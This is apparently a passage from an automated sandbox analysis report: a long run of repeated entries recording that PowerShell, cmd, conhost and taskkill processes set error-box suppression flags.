                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
